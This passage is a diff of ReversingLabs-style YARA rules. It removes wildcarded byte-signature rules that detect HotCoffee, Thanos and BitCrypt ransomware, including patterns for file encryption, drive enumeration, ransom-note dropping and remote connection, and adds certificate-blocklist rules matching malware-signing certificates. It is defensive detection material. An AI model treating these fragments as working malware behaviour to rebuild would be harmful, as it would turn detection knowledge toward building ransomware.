-		logic_hash = "15ae428c37fcc5a09d324fd9be5a8df3a812e6459cb1ce8eec56eabf785b4c05"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L12178-L12196"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "2c47166f02c7f94bb4f82296e3220ff7ca3c6c53566d855b2fe77cb842a5fb43"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "HotCoffee"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files = {
-            48 85 C9 74 ?? B8 ?? ?? ?? ?? 48 2B C1 48 85 C9 48 0F 44 C6 BA ?? ?? ?? ?? 48 2B D0
-            48 8D 8D ?? ?? ?? ?? 48 8D 0C 41 74 ?? 48 05 ?? ?? ?? ?? 48 03 C2 4C 8D 0D ?? ?? ??
-            ?? 4C 2B C9 0F 1F 44 00 ?? 48 85 C0 74 ?? 45 0F B7 04 09 66 45 85 C0 74 ?? 66 44 89
-            01 48 83 C1 ?? 48 FF C8 48 83 EA ?? 75 ?? 48 8D 41 ?? 48 85 D2 48 0F 45 C1 66 89 30
-            48 8D 95 ?? ?? ?? ?? 48 83 BD ?? ?? ?? ?? ?? 48 0F 43 95 ?? ?? ?? ?? 48 8D 44 24 ??
-            48 89 44 24 ?? 41 B8 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 4C 8B 44 24 ?? BA ??
-            ?? ?? ?? 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8D 44 24 ?? 48 8B 4C 24 ?? 48 3B
-            C8 74 ?? FF 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 66 39 30 74 ?? 48 83
-            C0 ?? 48 83 E9 ?? 75 ?? 48 85 C9 74 ?? B8 ?? ?? ?? ?? 48 2B C1 48 85 C9 48 0F 44 C6
-            BA ?? ?? ?? ?? 48 2B D0 48 8D 8D ?? ?? ?? ?? 48 8D 0C 41 74 ?? 48 05 ?? ?? ?? ?? 48
-            03 C2 4C 8D 0D ?? ?? ?? ?? 4C 2B C9 48 85 C0 74 ?? 45 0F B7 04 09 66 45 85 C0 74 ??
-            66 44 89 01 48 83 C1 ?? 48 FF C8 48 83 EA ?? 75 ?? 48 8D 41 ?? 48 85 D2 48 0F 45 C1
-            66 89 30 48 8D 95 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 4C 8B E0 48 89
-            44 24 ?? 48 83 F8 ?? 75 ?? 48 8B 95 ?? ?? ?? ?? 48 83 FA ?? 72 ?? 48 FF C2 48 8B 8D
-            ?? ?? ?? ?? 48 8B C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48
-            83 C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0
-        }
-		$encrypt_files_p1 = {
-            B9 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 90 66 83 38 ?? 74 ?? 48 83 C0 ?? 48 83 E9 ?? 75
-            ?? 48 85 C9 74 ?? 41 B8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 4C 2B C1 BA ?? ?? ?? ?? 48
-            85 C9 4C 0F 44 C3 4A 8D 04 40 49 2B D0 74 ?? 49 8D 88 ?? ?? ?? ?? 48 03 CA 4C 8D 0D
-            ?? ?? ?? ?? 4C 2B C8 66 90 48 85 C9 74 ?? 45 0F B7 04 01 66 45 85 C0 74 ?? 66 44 89
-            00 48 FF C9 48 83 C0 ?? 48 83 EA ?? 75 ?? 48 85 D2 48 8D 48 ?? 48 0F 45 C8 66 89 19
-            48 89 5C 24 ?? 45 33 C9 C7 44 24 ?? ?? ?? ?? ?? 44 8B C7 8B D7 C7 44 24 ?? ?? ?? ??
-            ?? 49 8B CC FF 15 ?? ?? ?? ?? 45 33 C9 48 89 5C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 48 8D
-            8D ?? ?? ?? ?? 44 8B C7 C7 44 24 ?? ?? ?? ?? ?? 48 8B F0 41 8D 51 ?? FF 15 ?? ?? ??
-            ?? 41 B9 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 33 D2 48 8D 0D ??
-            ?? ?? ?? 4C 8B F0 FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 75 ?? 41 B9 ??
-            ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 33 D2 48 8D 0D ?? ?? ?? ?? FF
-            15 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 45 33 C9 48 89 44 24 ?? 45
-        }
-		$encrypt_files_p2 = {
-            33 C0 BA ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8B
-            15 ?? ?? ?? ?? 45 33 C9 48 8B 8D ?? ?? ?? ?? 44 8B C0 FF 15 ?? ?? ?? ?? 4C 8B 85 ??
-            ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 44 8B CF BA ?? ?? ?? ?? 48 89 44
-            24 ?? FF 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 32 DB 41 BD ?? ?? ?? ?? 48
-            8B F8 66 66 66 0F 1F 84 00 ?? ?? 00 00 4C 8D 8D ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ??
-            ?? 41 B8 ?? ?? ?? ?? 48 8B D7 48 8B CE FF 15 ?? ?? ?? ?? 81 BD ?? ?? ?? ?? ?? ?? ??
-            ?? 48 8D 85 ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 48 89 44 24 ??
-            0F B6 DB 41 0F 42 DD 48 89 7C 24 ?? 44 0F B6 C3 45 33 C9 33 D2 FF 15 ?? ?? ?? ?? 44
-            8B 85 ?? ?? ?? ?? 4C 8D 8D ?? ?? ?? ?? 48 8B D7 48 C7 44 24 ?? ?? ?? ?? ?? 49 8B CE
-            FF 15 ?? ?? ?? ?? 84 DB 0F 84 ?? ?? ?? ?? 4C 8B 6C 24 ?? 48 85 F6 74 ?? 48 8B CE FF
-            15 ?? ?? ?? ?? 4D 85 F6
-        }
-		$drop_ransom_note = {
-            48 85 C9 74 ?? B8 ?? ?? ?? ?? 48 2B C1 48 85 C9 49 0F 44 C6 BA ?? ?? ?? ?? 48 2B D0
-            48 8D 8D ?? ?? ?? ?? 48 8D 0C 41 74 ?? 48 05 ?? ?? ?? ?? 48 03 C2 4C 8D 0D ?? ?? ??
-            ?? 4C 2B C9 66 90 48 85 C0 74 ?? 46 0F B7 04 09 66 45 85 C0 74 ?? 66 44 89 01 48 83
-            C1 ?? 48 FF C8 48 83 EA ?? 75 ?? 48 8D 41 ?? 48 85 D2 48 0F 45 C1 66 44 89 30 4C 89
-            74 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 45 33 C9 45 33 C0 BA ?? ??
-            ?? ?? 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8B D8 49 C7 C0 ?? ?? ?? ?? 49 FF C0
-            46 38 34 06 75 ?? 4C 89 74 24 ?? 4C 8D 8D ?? ?? ?? ?? 48 8B D6 48 8B CB FF 15 ?? ??
-            ?? ?? 48 85 DB 74 ?? 48 8B CB FF 15 ?? ?? ?? ?? 48 8B CE E8 ?? ?? ?? ?? 90 48 8B 95
-            ?? ?? ?? ?? 48 83 FA ?? 72 ?? 48 FF C2 48 8B 4D ?? 48 8B C1 48 81 FA ?? ?? ?? ?? 72
-            ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 33 F6 48 89 B5 ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 40 88 75 ?? 48
-            8B 95 ?? ?? ?? ?? 48 83 FA ?? 0F 82 ?? ?? ?? ?? 48 8D 14 55 ?? ?? ?? ?? 48 8B 8D ??
-            ?? ?? ?? 48 8B C1 48 81 FA ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? 48 83 C2 ?? 48 8B 49 ?? 48
-            2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 86 ?? ?? ?? ?? FF 15
-        }
-		$enum_drives = {
-            48 89 5D ?? 48 C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? FF 15 ?? ?? ?? ?? 8B F8 0F A3 DF 0F
-            83 ?? ?? ?? ?? 8D 4B ?? 48 C7 45 ?? ?? ?? ?? ?? 88 4D ?? 48 C7 45 ?? ?? ?? ?? ?? 66
-            C7 45 ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 3B 05 ?? ?? ?? ?? 74 ?? 48 8D 55 ?? 48 8B C8
-            E8 ?? ?? ?? ?? 48 83 05 ?? ?? ?? ?? ?? EB ?? 4C 8D 45 ?? 48 8B D0 48 8D 0D ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 90 48 8B 45 ?? 48 83 F8 ?? 72 ?? 48 8D 50 ?? 48 8B 4D ?? 48 8B C1
-            48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ??
-            77 ?? E8 ?? ?? ?? ?? FF C3 83 FB ?? 0F 8C ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 F8 ?? 75 ??
-            E8 ?? ?? ?? ?? 90 33 C0 48 8B 4D ?? 48 33 CC E8 ?? ?? ?? ?? 4C 8D 5C 24 ?? 49 8B 5B
-            ?? 49 8B 7B ?? 49 8B E3 5D C3 FF 15
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $enum_drives ) and ( $find_files ) and ( all of ( $encrypt_files_p* ) ) and ( $drop_ransom_note )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "GAS Avto, d.o.o." and ( pe.signatures [ i ] . serial == "00:b0:6b:c1:66:fc:76:5d:ac:d2:f7:44:8c:8c:dd:92:05" or pe.signatures [ i ] . serial == "b0:6b:c1:66:fc:76:5d:ac:d2:f7:44:8c:8c:dd:92:05" ) and 1615507200 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Thanos : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_E9268Ed63A7D7E9Dfd40A664Ddfbaf18 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Thanos ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "e607255d-45a6-573d-956e-f6faa2aa7e9f"
-		date = "2021-08-12"
-		modified = "2021-08-12"
+		id = "a93b0a98-cfec-5e32-9fd8-b3d6c4353558"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/ByteCode.MSIL.Ransomware.Thanos.yara#L1-L106"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "f6bc0c2188a04d2fb2a82a6b6d6cdf7763c32047bec725fe07f01415edf0b4cd"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L12198-L12216"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "fc840c0b37867c3b0aa80d4dc609feaaab77d3f0c6f84c8bb2ea7c5a6461ebb8"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Thanos"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files_p1 = {
-            6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 16 FE 01 2B ?? 16 00 13 ?? 11 ?? 2D ?? DD
-            ?? ?? ?? ?? 08 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 08 6F ?? ?? ?? ?? 6C 7E ?? ?? ?? ??
-            28 ?? ?? ?? ?? 23 ?? ?? ?? ?? ?? ?? ?? ?? 5A 23 ?? ?? ?? ?? ?? ?? ?? ?? 5A 35 ?? 7E ??
-            ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 FE 01 2B ?? 17 00 13 ?? 11 ?? 2D ?? 00 06 08
-            6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 00 2B ?? 08 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 7E ??
-            ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 FE 01 2B ?? 17 00 13 ?? 11 ?? 2D ?? 00 06 08
-            6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 00 00 DE ?? 26 00 00 DE ?? 26 00 00 DE ?? 00 00 00 11
-            ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 3A ?? ?? ?? ?? DE ?? 11 ?? 14 FE 01 13 ?? 11 ?? 2D ?? 11
-            ?? 6F ?? ?? ?? ?? 00 DC 00 00 07 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 38
-            ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 0D 00 07 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ??
-            6F ?? ?? ?? ?? 2D ?? 07 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D
-            ?? 07 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 07 6F ?? ?? ??
-            ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 07 6F ?? ?? ?? ?? 6F
-        }
-		$find_files_p2 = {
-            72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 07 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F
-            ?? ?? ?? ?? 16 FE 01 2B ?? 16 00 13 ?? 11 ?? 2D ?? 38 ?? ?? ?? ?? 00 00 09 72 ?? ?? ??
-            ?? 17 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 38 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 0C 00 00
-            08 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? 08 6F ??
-            ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? 08 6F ?? ?? ?? ??
-            6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? 08 6F ?? ?? ?? ?? 6F ?? ??
-            ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A
-        }
-		$find_files_p3 = {
-            6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? 08 6F ?? ??
-            ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? 08 6F ?? ?? ?? ?? 6F
-            ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 08 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 00 6F
-            ?? ?? ?? ?? 2D ?? 08 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 08 6F ?? ?? ??
-            ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 08 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ??
-            2D ?? 08 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 08 6F ?? ?? ?? ?? 72 ?? ??
-            ?? ?? 6F ?? ?? ?? ?? 16 FE 01 2B ?? 16 00 13 ?? 11 ?? 2D ?? DD ?? ?? ?? ?? 08 6F ?? ??
-            ?? ?? 28 ?? ?? ?? ?? 2C ?? 08 6F ?? ?? ?? ?? 6C 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 23 ?? ??
-            ?? ?? ?? ?? ?? ?? 5A 23 ?? ?? ?? ?? ?? ?? ?? ?? 5A 35 ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ??
-            28 ?? ?? ?? ?? 16 FE 01 2B ?? 17 00 13 ?? 11 ?? 2D ?? 00 06 08 6F ?? ?? ?? ?? 6F ?? ??
-            ?? ?? 00 00 2B ?? 08 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ??
-            28 ?? ?? ?? ?? 16 FE 01 2B ?? 17 00 13 ?? 11 ?? 2D ?? 00 06 08 6F ?? ?? ?? ?? 6F ?? ??
-            ?? ?? 00 00 00 DE ?? 26 00 00 DE ?? 26 00 00 DE ?? 00 00 00 11 ?? 6F ?? ?? ?? ?? 13 ??
-            11 ?? 3A ?? ?? ?? ?? DE ?? 11 ?? 14 FE 01 13 ?? 11 ?? 2D ?? 11 ?? 6F ?? ?? ?? ?? 00 DC
-            00 00 DE ?? 26 00 00 DE ?? 26 00 00 DE ?? 00 00 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 3A ??
-            ?? ?? ?? DE ?? 11 ?? 14 FE 01 13 ?? 11 ?? 2D ?? 11 ?? 6F ?? ?? ?? ?? 00 DC 00 00 DE ??
-            26 00 00 DE ?? 26 00 00 DE ?? 26 00 00 DE ?? 26 00 00 DE ?? 00 06 13 ?? 2B ?? 11 ?? 2A
-        }
-		$encrypt_files = {
-            73 ?? ?? ?? ?? 13 ?? 11 ?? 03 7D ?? ?? ?? ?? 11 ?? 04 7D ?? ?? ?? ?? 11 ?? 05 7D ?? ??
-            ?? ?? 11 ?? 0E ?? 7D ?? ?? ?? ?? 00 28 ?? ?? ?? ?? 11 ?? 7B ?? ?? ?? ?? 6F ?? ?? ?? ??
-            80 ?? ?? ?? ?? 02 16 9A 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 FE 01 13 ?? 11 ?? 2D ?? 00 28
-            ?? ?? ?? ?? 0A 06 8E 69 16 FE 02 16 FE 01 13 ?? 11 ?? 2D ?? 00 16 0B 2B ?? 00 06 07 9A
-            6F ?? ?? ?? ?? 16 FE 01 13 ?? 11 ?? 2D ?? 00 7E ?? ?? ?? ?? 06 07 9A 6F ?? ?? ?? ?? 6F
-            ?? ?? ?? ?? 13 ?? 11 ?? 2D ?? 00 7E ?? ?? ?? ?? 06 07 9A 6F ?? ?? ?? ?? 6F ?? ?? ?? ??
-            00 00 00 00 07 17 58 0B 07 06 8E 69 FE 04 13 ?? 11 ?? 2D ?? 00 00 2B ?? 00 16 0B 2B ??
-            00 7E ?? ?? ?? ?? 02 07 9A 6F ?? ?? ?? ?? 13 ?? 11 ?? 2D ?? 00 7E ?? ?? ?? ?? 02 07 9A
-            6F ?? ?? ?? ?? 00 00 00 07 17 58 0B 07 02 8E 69 FE 04 13 ?? 11 ?? 2D ?? 00 7E ?? ?? ??
-            ?? 72 ?? ?? ?? ?? 00 6F ?? ?? ?? ?? 2C ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ??
-            16 FE 01 2B ?? 17 00 13 ?? 11 ?? 2D ?? 00 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 00 6F ?? ?? ??
-            ?? 26 00 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 38 ?? ?? ?? ?? 14 0D 73 ?? ?? ?? ?? 13
-            ?? 11 ?? 11 ?? 7D ?? ?? ?? ?? 11 ?? 12 ?? 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 00 7E ?? ?? ??
-            ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 FE 01 13 ?? 11 ?? 2D ?? 00 09 2D ?? 11 ?? FE 06 ??
-            ?? ?? ?? 73 ?? ?? ?? ?? 0D 2B ?? 09 73 ?? ?? ?? ?? 0C 08 1A 6F ?? ?? ?? ?? 00 08 16 6F
-            ?? ?? ?? ?? 00 08 6F ?? ?? ?? ?? 00 08 6F ?? ?? ?? ?? 00 00 2B ?? 00 11 ?? 7B ?? ?? ??
-            ?? 11 ?? 7B ?? ?? ?? ?? 11 ?? 7B ?? ?? ?? ?? 11 ?? 7B ?? ?? ?? ?? 11 ?? 7B ?? ?? ?? ??
-            28 ?? ?? ?? ?? 00 00 00 12 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 3A ?? ?? ?? ?? DE ?? 12 ?? FE
-            16 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 DC 00 00 2A
-        }
-		$remote_connection = {
-            00 00 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 16 19 6F ?? ?? ?? ??
-            72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 73 ?? ?? ?? ?? 0B 07 02 28 ?? ?? ?? ?? 06 28 ?? ?? ??
-            ?? 6F ?? ?? ?? ?? 00 28 ?? ?? ?? ?? 06 28 ?? ?? ?? ?? 0C DE ?? 26 00 00 DE ?? 00 7E ??
-            ?? ?? ?? 0C 2B ?? 00 08 2A
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( $encrypt_files ) and ( $remote_connection )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Casta, s.r.o." and ( pe.signatures [ i ] . serial == "00:e9:26:8e:d6:3a:7d:7e:9d:fd:40:a6:64:dd:fb:af:18" or pe.signatures [ i ] . serial == "e9:26:8e:d6:3a:7d:7e:9d:fd:40:a6:64:dd:fb:af:18" ) and 1647302400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Win32_Ransomware_Bitcrypt : TC_DETECTION MALICIOUS MALWARE FILE
+rule REVERSINGLABS_Cert_Blocklist_425Dc3E0Ca8Bcdce19D00D87E3F0Ba28 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects BitCrypt ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "f00a0fd8-31a9-5ee6-b560-09ccf6fe490b"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "df6e1403-c300-5d97-b57d-dc70d61b2229"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.BitCrypt.yara#L3-L112"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "66cfe16a182e7f20d6358be9569ada5e6c36c94d44781d8c741638e1b174d44e"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L12218-L12234"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "67a975f2806825bf0da27fcaf33c2ff497fe9bb2af12c22ff505b49070516960"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "BitCrypt"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$bc_bcdedit = {
-            55 8B EC 6A ?? 53 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 B2 ?? A1 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8B D8 BA ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B C3
-            E8 ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 BA ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 8D 45
-            ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ??
-            ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ??
-            68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? C3
-        }
-		$bc_enum_drives_a_z = {
-            55 8B EC 81 C4 ?? ?? ?? ?? 53 56 33 D2 89 95 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8B F0 33 C0 55 68 ?? ?? ??
-            ?? 64 FF 30 64 89 20 B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 06 B3 ?? 8D 85 ?? ?? ?? ?? 8B D3 E8 ?? ?? ?? ?? 8D 85 ?? ??
-            ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ??
-            8D 45 ?? B1 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B D3 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B
-            85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 E8 ?? 75 1B 8D 85 ?? ?? ?? ?? 8D 55 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ??
-            ?? 8B 06 8B 08 FF 51 ?? 43 80 FB ?? 0F 85 65 FF FF FF 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ??
-            ?? ?? E8 ?? ?? ?? ?? C3
-        }
-		$bc_do_extensions_1 = {
-            55 8B EC 81 C4 ?? ?? ?? ?? 53 56 57 33 DB 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D
-            ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 4D ?? 89 55 ?? 89 45 ?? 8B 7D ?? 8B 5D ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ??
-            ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 85 ??
-            ?? ?? ?? 8B 4D ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 0F 85 81 01 00 00 E8 ?? ?? ?? ?? BA ??
-            ?? ?? ?? 33 C0 E8 ?? ?? ?? ?? 8B F0 8B C3 8B 14 B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB 28 A0 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ??
-            50 8B 03 33 C9 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 8B 13 B8 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            85 C0 75 C8 EB 28 A0 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8B 03 33 C9 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B
